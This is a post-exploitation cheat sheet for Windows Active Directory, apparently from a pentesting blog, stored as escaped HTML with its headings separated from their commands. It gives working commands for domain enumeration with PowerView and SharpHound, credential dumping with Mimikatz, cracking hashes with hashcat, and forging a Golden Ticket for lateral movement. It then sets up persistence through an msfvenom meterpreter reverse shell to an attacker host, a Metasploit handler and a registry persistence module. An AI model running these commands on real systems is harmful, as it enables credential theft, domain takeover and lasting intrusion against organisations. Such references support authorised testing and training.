After getting the foot in the door in a pentesting scenario or competition it is time for gathering more data and credentials and creating persistence:<\/p>\n
Enumerating the domain<\/strong> with the PowerShell script PowerView – Full command list available at [Link<\/a>]:<\/p>\n Enumerate Domain Users<\/strong><\/p>\n Enumerate Computers<\/strong><\/p>\n Enumerate Groups<\/strong><\/p>\n Enumerate Shares<\/strong><\/p>\n Extract the loot<\/strong> from any computer joined to the domain with SharpHound<\/strong> script:<\/p>\n Copy the file over to the attacker’s machine.<\/p>\n Explore the domain<\/strong> with BloodHound Community Edition<\/strong> [Link<\/a>].<\/p>\n Installing the tool on the attacker machine:<\/p>\n Navigate to http:\/\/localhost:8080\/<\/strong> and log in with the acquired password for the user Admin (change it!)<\/p>\n Search for import\/ingest and provide .zip<\/strong> or the extracted .json<\/strong> files.<\/p>\n After some time the data will be ready for queries in the Explore<\/strong> tab.<\/p>\n Dumping hashes<\/strong> with Mimikatz<\/strong>:<\/p>\n Chacking<\/strong> the dumped hashes<\/strong> with HashCat:<\/p>\n Creating a Golden Ticket<\/strong> with Mimikatz:<\/p>\n Getting access<\/strong> to other machines with the Golden Ticket on the newly open window:<\/p>\n CREATING PERSISTENCE<\/strong><\/p>\n Crafting a payload<\/strong> with Msfvenom<\/strong>:<\/p>\n On the attacker side start a listener with Metasploit<\/strong> – Module Library available at [Link<\/a>]:<\/p>\n Applying persistence<\/strong> to the granted session with Persistent Registry Startup Payload Installer<\/strong>:<\/p>\ncmd\r\npowershell -ep bypass\r\n. .\\PATH\\PowerView.ps1<\/pre>\n
Get-NetUser | select cn<\/pre>\n
Get-NetComputer -fulldata | select operatingsystem<\/pre>\n
Get-NetGroup -GroupName *admin*<\/pre>\n
Invoke-ShareFinder<\/pre>\n
\npowershell -ep bypass\r\n. .\\PATH\\SharpHound.ps1\r\nInvoke-Bloodhound -CollectionMethod All -Domain DOMAIN.local -ZipFileName loot.zip<\/pre>\n
\nsudo apt update && sudo apt install docker.io docker-compose -y\r\ncurl -L https:\/\/ghst.ly\/getbhce | sudo docker compose -f - up\r\nsudo docker-compose logs bloodhound | grep 'Password'<\/pre>\n
\nmimikatz.exe\r\nprivilege::debug\r\nlsadump::lsa \/patch<\/pre>\n
hashcat -m 1000 hashes.lst \/usr\/share\/wordlists\/rockyou.txt<\/pre>\n
lsadump::lsa \/inject \/name:userName\r\nkerberos::golden \/user:administrator \/domain:domain.local<\/strong> \/sid:S-3-5-41-845420856-2351964987-986696098<\/strong> \/userName<\/strong>:5508500012cc005cf7082a9a89ebdfdf<\/strong> \/id:500\r\nmisc::cmd<\/pre>\n
dir \\\\ComputerA<\/strong>\\c$<\/strong><\/pre>\n
\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.10.10.99<\/strong> LPORT=4444<\/strong> -f exe -o shell.exe<\/pre>\n
use exploit\/multi\/handler\r\nset payload windows\/meterpreter\/reverse_tcp\r\nrun\r\nbackground<\/pre>\n
use exploit\/windows\/local\/persistence\r\nsessions\r\nset session 1<\/pre>\n